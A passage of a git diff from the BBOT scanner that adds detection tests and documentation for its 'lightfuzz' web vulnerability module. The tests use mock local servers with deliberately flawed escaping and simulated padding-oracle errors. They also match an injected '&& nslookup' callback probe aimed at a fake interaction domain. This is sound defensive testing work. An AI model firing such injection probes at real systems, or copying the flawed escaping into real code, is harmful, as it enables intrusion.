reflected input: {post_params['TextBox1']}" + ) + return Response(dotnet_serial_reflection, status=500) + + def check(self, module_test, events): + finding_count = 0 + for e in events: + if e.type == "FINDING": + finding_count += 1 + assert finding_count == 0, "Unexpected FINDING events reported" + + +# CMDi echo canary +class Test_Lightfuzz_cmdi(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["cmdi"], + } + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + + parameter_block = """ +

+ """ + if "search=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + if "&& echo " in unquote(value): + cmdi_value = unquote(value).split("&& echo ")[1].split(" ")[0] + else: + cmdi_value = value + cmdi_block = f""" +
+

0 search results for '{unquote(cmdi_value)}'

+
+
+ """ + return Response(cmdi_block, status=200) + + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + cmdi_echocanary_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "POSSIBLE OS Command Injection. Parameter: [search] Parameter Type: [GETPARAM] Detection Method: [echo canary] CMD Probe Delimeters: [&&]" + in e.data["description"] + ): + cmdi_echocanary_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert cmdi_echocanary_finding_emitted, "echo canary CMDi FINDING not emitted" + + +# CMDi interactsh +class Test_Lightfuzz_cmdi_interactsh(Test_Lightfuzz_cmdi): + @staticmethod + def extract_subdomain_tag(data): + pattern = r"search=.+%26%26%20nslookup%20(.+)\.fakedomain\.fakeinteractsh.com%20%26%26" + match = re.search(pattern, data) + if match: + return match.group(1) + + config_overrides = { + "interactsh_disable": False, + "modules": { + "lightfuzz": { + "enabled_submodules": ["cmdi"], + } + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + + parameter_block = """ + + """ + + if "search=" in qs: + subdomain_tag = None + subdomain_tag = self.extract_subdomain_tag(request.full_path) + + if subdomain_tag: + self.interactsh_mock_instance.mock_interaction(subdomain_tag) + return Response(parameter_block, status=200) + + async def setup_before_prep(self, module_test): + self.interactsh_mock_instance = module_test.mock_interactsh("lightfuzz") + + module_test.monkeypatch.setattr( + module_test.scan.helpers, "interactsh", lambda *args, **kwargs: self.interactsh_mock_instance + ) + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + cmdi_interacttsh_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "VULNERABILITY": + if ( + "OS Command Injection (OOB Interaction) Type: [GETPARAM] Parameter Name: [search] Probe: [&&]" + in e.data["description"] + ): + cmdi_interacttsh_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert cmdi_interacttsh_finding_emitted, "interactsh CMDi FINDING not emitted" + + +class Test_Lightfuzz_speculative(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "paramminer_getparams", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["xss"]}, + "paramminer_getparams": {"wordlist": tempwordlist([]), "recycle_words": True}, + "excavate": {"speculate_params": True}, + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + parameter_block = """ + { + "search": 1, + "common": 1 + } + """ + if "search=" in qs: + value = qs.split("=")[1] + if "&" in 
value: + value = value.split("&")[0] + xss_block = f""" +
+

0 search results for '{unquote(value)}'

+
+
+ """ + return Response(xss_block, status=200) + return Response(parameter_block, status=200, headers={"Content-Type": "application/json"}) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + excavate_json_extraction = False + xss_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter (speculative from json content) [search]" in e.data["description"]: + excavate_json_extraction = True + + if e.type == "FINDING": + if "Possible Reflected XSS. Parameter: [search] Context: [Between Tags" in e.data["description"]: + xss_finding_emitted = True + + assert excavate_json_extraction, "Excavate failed to extract json parameter" + assert xss_finding_emitted, "Between Tags XSS FINDING not emitted" + + +class Test_Lightfuzz_crypto_error(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["crypto"]}, + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + + parameter_block = """ +
+
+ + +
+
+ """ + crypto_block = """ +
+

Access Denied!

+
+
+ """ + if "secret=" in qs: + value = qs.split("=")[1] + if value: + return Response(crypto_block, status=200) + + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + cryptoerror_parameter_extracted = False + cryptoerror_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [secret] (GET Form Submodule)" in e.data["description"]: + cryptoerror_parameter_extracted = True + if e.type == "FINDING": + if ( + "Possible Cryptographic Error. Parameter: [secret] Parameter Type: [GETPARAM] Original Value: [08a5a2cea9c5a5576e6e5314edcba581d21c7111c9c0c06990327b9127058d67]" + in e.data["description"] + ): + cryptoerror_finding_emitted = True + assert cryptoerror_parameter_extracted, "Parameter not extracted" + assert cryptoerror_finding_emitted, "Crypto Error Message FINDING not emitted" + + +class Test_Lightfuzz_crypto_error_falsepositive(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["crypto"]}, + }, + } + + def request_handler(self, request): + fp_block = """ +
+
+ + +
+

Access Denied!

+
+ """ + return Response(fp_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + cryptoerror_parameter_extracted = False + cryptoerror_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [secret] (GET Form Submodule)" in e.data["description"]: + cryptoerror_parameter_extracted = True + if e.type == "FINDING": + if "Possible Cryptographic Error" in e.data["description"]: + cryptoerror_finding_emitted = True + assert cryptoerror_parameter_extracted, "Parameter not extracted" + assert not cryptoerror_finding_emitted, ( + "Crypto Error Message FINDING was emitted (it is an intentional false positive)" + ) + + +class Test_Lightfuzz_PaddingOracleDetection(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "excavate", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["crypto"], + } + }, + } + + def request_handler(self, request): + encrypted_value = quote( + "dplyorsu8VUriMW/8DqVDU6kRwL/FDk3Q+4GXVGZbo0CTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg==" + ) + default_html_response = f""" + + +
+ + +
+ + + """ + + if "/decrypt" in request.url and request.method == "POST": + if request.form and request.form["encrypted_data"]: + encrypted_data = request.form["encrypted_data"] + if "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALwAgLKWJi2nWKbh9ag5rnhm" in encrypted_data: + response_content = "Padding error detected" + elif "4GXVGZbo0DTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg" in encrypted_data: + response_content = "DIFFERENT CRYPTOGRAPHIC ERROR" + elif "AAAAAAA" in encrypted_data: + response_content = "YET DIFFERENT CRYPTOGRAPHIC ERROR" + else: + response_content = "Decryption failed" + + return Response(response_content, status=200) + else: + return Response(default_html_response, status=200) + + async def setup_after_prep(self, module_test): + module_test.set_expect_requests_handler(expect_args=re.compile(".*"), request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_extracted = False + cryptographic_parameter_finding = False + padding_oracle_detected = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [encrypted_data] (POST Form" in e.data["description"]: + web_parameter_extracted = True + if e.type == "FINDING": + if ( + e.data["description"] + == "Probable Cryptographic Parameter. Parameter: [encrypted_data] Parameter Type: [POSTPARAM] Original Value: [dplyorsu8VUriMW/8DqVDU6kRwL/FDk3Q%2B4GXVGZbo0CTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg%3D%3D] Detection Technique(s): [Single-byte Mutation] Envelopes: [URL-Encoded]" + ): + cryptographic_parameter_finding = True + + if e.type == "VULNERABILITY": + if ( + e.data["description"] + == "Padding Oracle Vulnerability. Block size: [16] Parameter: [encrypted_data] Parameter Type: [POSTPARAM] Original Value: [dplyorsu8VUriMW/8DqVDU6kRwL/FDk3Q%2B4GXVGZbo0CTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg%3D%3D] Envelopes: [URL-Encoded]" + ): + padding_oracle_detected = True + + assert web_parameter_extracted, "Web parameter was not extracted" + assert cryptographic_parameter_finding, "Cryptographic parameter not detected" + assert padding_oracle_detected, "Padding oracle vulnerability was not detected" + + +class Test_Lightfuzz_XSS_jsquotecontext(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate", "paramminer_getparams"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["xss"]}, + "paramminer_getparams": {"wordlist": tempwordlist(["junk", "input"]), "recycle_words": True}, + }, + } + + def request_handler(self, request): + # Decode the query string + qs = str(request.query_string.decode()) + default_output = """ + +
+ + +
+
+        """
+
+        if "input=" in qs:
+            # Split the query string to isolate the 'input' parameter
+            params = qs.split("&")
+            input_value = None
+            for param in params:
+                if param.startswith("input="):
+                    input_value = param.split("=")[1]
+                    break
+
+            if input_value:
+                # Simulate flawed escaping
+                sanitized_input = input_value.replace('"', '\\"').replace("'", "\\'")
+                sanitized_input = sanitized_input.replace("<", "%3C").replace(">", "%3E")
+
+                # Construct the reflected block with the sanitized input
+                reflected_block = f"""
+
+
+
+                """
+                return Response(reflected_block, status=200)
+
+        return Response(default_output, status=200)
+
+    async def setup_after_prep(self, module_test):
+        module_test.scan.modules["paramminer_getparams"].rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA"
+        module_test.monkeypatch.setattr(
+            helper.HttpCompare, "gen_cache_buster", lambda *args, **kwargs: {"AAAAAA": "1"}
+        )
+        expect_args = re.compile("/")
+        module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler)
+
+    def check(self, module_test, events):
+        web_parameter_emitted = False
+        xss_finding_emitted = False
+
+        for e in events:
+            if e.type == "WEB_PARAMETER":
+                if "[Paramminer] Getparam: [input] Reasons: [body] Reflection: [True]" in e.data["description"]:
+                    web_parameter_emitted = True
+
+            if e.type == "FINDING":
+                if (
+                    "Possible Reflected XSS. Parameter: [input] Context: [In Javascript (escaping the escape character, single quote)] Parameter Type: [GETPARAM]"
+                    in e.data["description"]
+                ):
+                    xss_finding_emitted = True
+
+        assert web_parameter_emitted, "WEB_PARAMETER was not emitted"
+        assert xss_finding_emitted, "XSS FINDING not emitted"
+
+
+class Test_Lightfuzz_XSS_jsquotecontext_doublequote(Test_Lightfuzz_XSS_jsquotecontext):
+    def request_handler(self, request):
+        qs = str(request.query_string.decode())
+        default_output = """
+
+
+ + +
+
+        """
+
+        if "input=" in qs:
+            params = qs.split("&")
+            input_value = None
+            for param in params:
+                if param.startswith("input="):
+                    input_value = param.split("=")[1]
+                    break
+
+            if input_value:
+                # Simulate flawed escaping with opposite quotes
+                sanitized_input = input_value.replace("'", "\\'").replace('"', '\\"')
+                sanitized_input = sanitized_input.replace("<", "%3C").replace(">", "%3E")
+
+                reflected_block = f"""
+
+
+
+                """
+                return Response(reflected_block, status=200)
+
+        return Response(default_output, status=200)
+
+    def check(self, module_test, events):
+        web_parameter_emitted = False
+        xss_finding_emitted = False
+
+        for e in events:
+            if e.type == "WEB_PARAMETER":
+                if "[Paramminer] Getparam: [input] Reasons: [body] Reflection: [True]" in e.data["description"]:
+                    web_parameter_emitted = True
+
+            if e.type == "FINDING":
+                if (
+                    "Possible Reflected XSS. Parameter: [input] Context: [In Javascript (escaping the escape character, double quote)] Parameter Type: [GETPARAM]"
+                    in e.data["description"]
+                ):
+                    xss_finding_emitted = True
+
+        assert web_parameter_emitted, "WEB_PARAMETER was not emitted"
+        assert xss_finding_emitted, "XSS FINDING not emitted"
diff --git a/bbot/test/test_step_2/module_tests/test_module_paramminer_getparams.py b/bbot/test/test_step_2/module_tests/test_module_paramminer_getparams.py
index a3acf0e6a9..554d617422 100644
--- a/bbot/test/test_step_2/module_tests/test_module_paramminer_getparams.py
+++ b/bbot/test/test_step_2/module_tests/test_module_paramminer_getparams.py
@@ -194,7 +194,10 @@ class TestParamminer_Getparams_xmlspeculative(Paramminer_Headers):
     targets = ["http://127.0.0.1:8888/"]
     modules_overrides = ["httpx", "excavate", "paramminer_getparams"]
     config_overrides = {
-        "modules": {"paramminer_getparams": {"wordlist": tempwordlist(["data", "common"]), "recycle_words": False}}
+        "modules": {
+            "excavate": {"speculate_params": True},
+            "paramminer_getparams": {"wordlist": tempwordlist(["data", "common"]), "recycle_words": False},
+        }
     }
 
     getparam_extract_xml = """
diff --git a/bbot/test/test_step_2/module_tests/test_module_paramminer_headers.py b/bbot/test/test_step_2/module_tests/test_module_paramminer_headers.py
index 20499abc06..6ca649510b 100644
--- a/bbot/test/test_step_2/module_tests/test_module_paramminer_headers.py
+++ b/bbot/test/test_step_2/module_tests/test_module_paramminer_headers.py
@@ -27,7 +27,7 @@ class Paramminer_Headers(ModuleTestBase):
     """
 
     async def setup_after_prep(self, module_test):
-        module_test.scan.modules["paramminer_headers"].rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA"
+        module_test.scan.modules["paramminer_headers"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA"
         module_test.monkeypatch.setattr(
             helper.HttpCompare, "gen_cache_buster", lambda *args, **kwargs: {"AAAAAA": "1"}
         )
@@ -108,7 +108,7 @@ class TestParamminer_Headers_extract(Paramminer_Headers):
     """
 
     async def setup_after_prep(self, module_test):
-        module_test.scan.modules["paramminer_headers"].rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA"
+        module_test.scan.modules["paramminer_headers"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA"
         module_test.monkeypatch.setattr(
             helper.HttpCompare, "gen_cache_buster", lambda *args, **kwargs: {"AAAAAA": "1"}
         )
@@ -153,3 +153,47 @@ def check(self, module_test, events):
     assert not excavate_extracted_web_parameter, (
         "Excavate extract WEB_PARAMETER despite disabling parameter extraction"
     )
+
+
+class TestParamminer_Headers_NoCookieRetention(Paramminer_Headers):
+    async def setup_after_prep(self, module_test):
+        
module_test.scan.modules["paramminer_headers"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + module_test.monkeypatch.setattr( + helper.HttpCompare, "gen_cache_buster", lambda *args, **kwargs: {"AAAAAA": "1"} + ) + + expect_args = {"headers": {"tracestate": "AAAAAAAAAAAAAA"}} + respond_args = {"response_data": self.headers_body_match} + module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args) + + headers_body_with_cookie = """ + + the title + +

Hello with cookie!

'; + + + """ + expect_args = {"headers": {"Cookie": "test_cookie=cookie_value; AAAAAAAAAAAAAA=AAAAAAAAAAAAAA"}} + respond_args_with_cookie_body_change = {"response_data": headers_body_with_cookie} + module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args_with_cookie_body_change) + + respond_args_default = { + "response_data": self.headers_body, + "headers": {"set-cookie": "test_cookie=cookie_value"}, + } + module_test.set_expect_requests(respond_args=respond_args_default) + + def check(self, module_test, events): + found_web_parameter = False + found_web_parameter_false_positive = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "[Paramminer] Header: [tracestate]" in e.data["description"]: + found_web_parameter = True + if "junkword1" in e.data["description"]: + found_web_parameter_false_positive = True + + assert found_web_parameter, "WEB_PARAMETER event was not emitted" + assert not found_web_parameter_false_positive, "WEB_PARAMETER event was emitted with false positive" diff --git a/bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py b/bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py new file mode 100644 index 0000000000..2a4bf33c29 --- /dev/null +++ b/bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py @@ -0,0 +1,226 @@ +from .base import ModuleTestBase, tempwordlist +from werkzeug.wrappers import Response +import re + +from .test_module_paramminer_getparams import TestParamminer_Getparams +from .test_module_paramminer_headers import helper + + +class TestReflected_parameters_fromexcavate(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "reflected_parameters", "excavate"] + + def request_handler(self, request): + normal_block = 'foo' + qs = str(request.query_string.decode()) + if "reflected=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + reflected_block = f'' + return Response(reflected_block, status=200) + else: + return Response(normal_block, status=200) + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and e.data["description"] + == "[GETPARAM] Parameter value reflected in response body. Name: [reflected] Source Module: [excavate] Original Value: [foo]" + for e in events + ) + + +class TestReflected_parameters_headers(TestReflected_parameters_fromexcavate): + modules_overrides = ["httpx", "reflected_parameters", "excavate", "paramminer_headers"] + config_overrides = { + "modules": { + "paramminer_headers": {"wordlist": tempwordlist(["junkword1", "tracestate"]), "recycle_words": True} + } + } + + def request_handler(self, request): + headers = {k.lower(): v for k, v in request.headers.items()} + if "tracestate" in headers: + reflected_value = headers["tracestate"] + reflected_block = f"
{reflected_value}
" + return Response(reflected_block, status=200) + else: + return Response("
", status=200) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and e.data["description"] + == "[HEADER] Parameter value reflected in response body. Name: [tracestate] Source Module: [paramminer_headers]" + for e in events + ) + + +class TestReflected_parameters_fromparamminer(TestParamminer_Getparams): + modules_overrides = ["httpx", "paramminer_getparams", "reflected_parameters"] + + def request_handler(self, request): + normal_block = "" + qs = str(request.query_string.decode()) + if "id=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + reflected_block = f'' + return Response(reflected_block, status=200) + else: + return Response(normal_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["paramminer_getparams"].rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + module_test.monkeypatch.setattr( + helper.HttpCompare, "gen_cache_buster", lambda *args, **kwargs: {"AAAAAA": "1"} + ) + + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and "[GETPARAM] Parameter value reflected in response body. Name: [id] Source Module: [paramminer_getparams]" + in e.data["description"] + for e in events + ) + + +class TestReflected_parameters_with_canary(TestReflected_parameters_fromexcavate): + def request_handler(self, request): + normal_block = 'foo' + qs = str(request.query_string.decode()) + if qs: + # Split the query string into key-value pairs + params = qs.split("&") + # Construct the reflected block with all parameters + reflected_block = '
{reflected_value}
" + return Response(reflected_block, status=200) + else: + return Response("
", status=200) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and e.data["description"] + == "[COOKIE] Parameter value reflected in response body. Name: [testcookie] Source Module: [paramminer_cookies]" + for e in events + ) + + +class TestReflected_parameters_postparams(TestReflected_parameters_fromexcavate): + modules_overrides = ["httpx", "reflected_parameters", "excavate"] + + def request_handler(self, request): + form_data = request.form + if "testparam" in form_data: + reflected_value = form_data["testparam"] + reflected_block = f"
{reflected_value}
" + return Response(reflected_block, status=200) + else: + form_html = """ + + +
+ + +
+ + + """ + return Response(form_html, status=200) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and e.data["description"] + == "[POSTPARAM] Parameter value reflected in response body. Name: [testparam] Source Module: [excavate] Original Value: [default_value]" + for e in events + ) + + +class TestReflected_parameters_bodyjson(TestReflected_parameters_fromexcavate): + modules_overrides = ["httpx", "reflected_parameters", "excavate"] + + def request_handler(self, request): + # Ensure the request is expecting JSON data + if request.content_type == "application/json": + json_data = request.json + if "username" in json_data: + reflected_value = json_data["username"] + reflected_block = f"
{reflected_value}
" + return Response(reflected_block, status=200) + # Provide an HTML page with a jQuery AJAX call + jsonajax_extract_html = """ + + +
+
+        """
+        return Response(jsonajax_extract_html, status=200)
+
+    async def setup_after_prep(self, module_test):
+        expect_args = re.compile("/")
+        module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler)
+
+    def check(self, module_test, events):
+        assert any(
+            e.type == "FINDING"
+            and e.data["description"]
+            == "[BODYJSON] Parameter value reflected in response body. Name: [username] Source Module: [excavate]"
+            for e in events
+        )
diff --git a/bbot/wordlists/paramminer_parameters.txt b/bbot/wordlists/paramminer_parameters.txt
index 501878d987..9ad334d19c 100644
--- a/bbot/wordlists/paramminer_parameters.txt
+++ b/bbot/wordlists/paramminer_parameters.txt
@@ -100,7 +100,6 @@ modify
 rename
 reset
 shell
-utm_content
 toggle
 adm
 cfg
@@ -616,7 +615,6 @@ replace
 read
 project
 Post
-PHPSESSID
 nid
 md5
 map
@@ -1532,10 +1530,6 @@ unstick
 unsecuresubmit
 unbookmark
 ua
-utm_source
-utm_campaign
-utm_medium
-utm_term
 typ
 tv
 tree
@@ -4754,7 +4748,6 @@ pPage
 pName
 pMail
 pDesc
-p4ssw0rD
 p3
 p2p
 p2index
@@ -5701,7 +5694,6 @@ dstendport
 dstbeginport
 dscp
 dryrun
-droptables
 drilldown
 dragtable
 dragdroporder
diff --git a/docs/modules/lightfuzz.md b/docs/modules/lightfuzz.md
new file mode 100644
index 0000000000..d10b7186c0
--- /dev/null
+++ b/docs/modules/lightfuzz.md
@@ -0,0 +1,126 @@
+# Lightfuzz
+
+*Lightfuzz is currently an experimental feature. There WILL be false positives (and, although we'll never know - false negatives), although the submodules are being actively worked on to reduce them. If you find false positives, please help us out by opening a GitHub issue with the details!*
+
+## Philosophy
+
+### What is Lightfuzz?
+
+Lightfuzz is a lightweight web vulnerability scanner built into BBOT. It is designed to find "low-hanging fruit" type vulnerabilities without much overhead and at massive scale.
+
+### What is Lightfuzz NOT?
+
+Lightfuzz is not, does not attempt to be, and will never be, a replacement for a full-blown web application scanner. You should not, for example, be running Lightfuzz as a replacement for Burp Suite scanning. The Burp Suite scanner will always find more (even though we can find a few things it can't).
+
+It will also not help you *exploit* vulnerabilities. Its job is to point out vulnerabilities, or likely vulnerabilities, or potential vulnerabilities, and then pass them off to you. A great deal of the overhead with traditional scanners comes in the confirmation phase, or in testing exploitation payloads.
+
+So for example, Lightfuzz may detect an XSS vulnerability for you. But it's NOT going to help you figure out which tag you need to use to get around a security filter, or give you any kind of a final payload. It's simply going to tell you that the contents of a given GET parameter are being reflected and that it was able to render an unmodified HTML tag. The rest is up to you.
+
+### False Positives
+
+Significant work has gone into minimizing false positives. However, due to the nature of how Lightfuzz works, they are a reality. Random hiccups in network connectivity can cause them in some cases; odd WAF behavior can account for others.
+
+If you see a false positive that you feel is occurring too often or could easily be prevented, please open a GitHub issue and we will take a look!
+
+### Deadly module
+
+Lightfuzz currently has the `deadly` flag. This is applied to the most aggressive modules to enforce an additional check, requiring explicit acknowledgement of the risk using the `--allow-deadly` command line flag.
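+
+For example, a hypothetical scan of `example.com` would refuse to run Lightfuzz until the flag is supplied (this mirrors the usage examples later on this page):
+
+```
+bbot -p lightfuzz -t example.com --allow-deadly
+```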
+
+## Modules
+
+Lightfuzz is divided into numerous "submodules". These are typically run all together, but they can be configured to run individually or in any desired combination. This is done with the aid of a `preset`; more on those in a moment.
+
+### `cmdi` (Command Injection)
+  - Finds output-based and blind out-of-band (via `Interactsh`) command injections
+### `crypto` (Cryptography)
+  - Identifies cryptographic parameters that have a tangible effect on the application
+  - Can identify padding oracle vulnerabilities
+  - Can identify hash length extension vulnerabilities
+### `nosqli` (NoSQL Injection)
+  - Can identify some NoSQL Injection vulnerabilities
+### `path` (Path Traversal)
+  - Can find arbitrary file read / local-file include vulnerabilities, based on relative path traversal or with absolute paths
+### `serial` (Deserialization)
+  - Can identify the active deserialization of a variety of deserialization types across several platforms
+### `sqli` (SQL Injection)
+  - Error-based SQLi detection
+  - Blind time-delay SQLi detection
+### `ssti` (Server-side Template Injection)
+  - Can find basic server-side template injection
+### `xss` (Cross-site Scripting)
+  - Can find a variety of XSS types, across several different contexts (between-tags, attribute, Javascript-based)
+
+## Presets
+
+Lightfuzz comes with a few pre-defined presets. The first thing to know is that, unless you really know BBOT inside and out, we recommend using one of them. This is because, to be successful, Lightfuzz needs to change a lot of very important BBOT settings. These include:
+
+* Setting `url_querystring_remove` to False. By default, BBOT strips away querystrings, so in order to fuzz GET parameters, that default has to be disabled.
+```
+url_querystring_remove: False
+```
+* Setting the `excavate` internal module to retain querystrings when it finds new URLs
+```
+  excavate:
+    retain_querystring: True
+```
+* Enabling several other complementary modules. Specifically, `hunt` and `reflected_parameters` are useful companion modules whenever `WEB_PARAMETER` events are being emitted.
+
+If you don't want to dive into those details, and we don't blame you, here are the built-in preset options and what you need to know about the differences.
+
+# -p lightfuzz
+
+This is the default setting, and it enables all submodules. It changes all of the essential BBOT settings to make Lightfuzz work, without too many extras. However, it is important to note that it **DISABLES FUZZING POST REQUESTS**. This is because this type of request is the most intrusive, and the most likely to cause problems, especially if it's run against an internal network.
+
+# -p lightfuzz-intense
+
+* Increases the web spider settings a bit from the default.
+* Adds the **Param Miner** suite of modules to try to find new parameters to fuzz via brute-force
+* Enables fuzzing of POST parameters
+
+# -p lightfuzz-max
+
+Everything included in `lightfuzz-intense`, plus:
+
+* Query string collapsing turned OFF. Normally, multiple instances of the same parameter (e.g., foo=bar and foo=bar2) are collapsed into one for fuzzing. With `lightfuzz-max`, each instance is fuzzed individually.
+* Force common headers enabled - fuzz certain common header parameters, even if we didn't discover them
+* 'Speculate' GET parameters from JSON or XML response bodies
+
+These settings aren't typically desired, as they add significant time to the scan.
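+
+If none of the built-in presets fits exactly, the same settings can be combined in a small custom preset file. Below is a minimal sketch (the file name is hypothetical; `enabled_submodules` is the same option shown in the usage examples at the end of this page):
+
+```
+# my_lightfuzz.yml - illustrative custom preset, not one of the built-ins
+description: Lightfuzz with only the xss and sqli submodules
+include:
+  - lightfuzz   # start from the stock lightfuzz preset
+  - spider      # strongly recommended; see the spider preset section below
+config:
+  modules:
+    lightfuzz:
+      enabled_submodules: [xss, sqli]
+```
+
+It can then be passed to BBOT directly, e.g. `bbot -p ./my_lightfuzz.yml -t targets.txt --allow-deadly`.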
+
+# -p lightfuzz-xss
+
+This is a special Lightfuzz preset that focuses entirely on XSS, to make XSS hunting as fast as possible. It is an example of how to make a preset that focuses on specific submodules. It also includes the `paramminer_getparams` module to help find undocumented parameters to fuzz.
+
+# -p lightfuzz-min
+
+This preset excludes all extra modules, dials down all the settings, and tests only the submodules for the most common vulnerabilities.
+
+# Spider preset
+
+We also *strongly* recommend running Lightfuzz with the spider enabled, as this will dramatically increase the number of parameters that are discovered. If you don't, you will see a warning reminding you that things will work a lot better if you do.
+
+That can be done by simply also enabling either the `spider` or `spider-intense` preset.
+
+# Usage
+
+With the presets in mind, usage is incredibly simple. In most cases you will just do the following:
+
+```
+bbot -p lightfuzz spider -t targets.txt --allow-deadly
+```
+
+It's really that simple. Almost all output from Lightfuzz will be in the form of a `FINDING`, as opposed to a `VULNERABILITY`, with a couple of exceptions. This is because, as was explained, the findings are typically unconfirmed, and confirming them will require work on your part.
+
+If you want only specific submodules, you can make your own preset that adjusts the `modules.lightfuzz.enabled_submodules` setting (as sketched earlier), or do so via the command line:
+
+Just XSS:
+```
+bbot -p lightfuzz -t targets.txt -c modules.lightfuzz.enabled_submodules=[xss] --allow-deadly
+```
+
+XSS and SQLi:
+```
+bbot -p lightfuzz -t targets.txt -c modules.lightfuzz.enabled_submodules=[xss,sqli] --allow-deadly
+```
+
+
diff --git a/poetry.lock b/poetry.lock
index f21dfc610f..0f14d81504 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -1,4 +1,4 @@
-# This file is automatically @generated by Poetry 1.8.5 and should not be changed by hand.
+# This file is automatically @generated by Poetry 1.8.3 and should not be changed by hand.
 
 [[package]]
 name = "annotated-types"
@@ -577,13 +577,13 @@ test = ["pytest (>=6)"]
 
 [[package]]
 name = "fastapi"
-version = "0.115.8"
+version = "0.115.9"
 description = "FastAPI framework, high performance, easy to learn, fast to code, ready for production"
 optional = false
 python-versions = ">=3.8"
 files = [
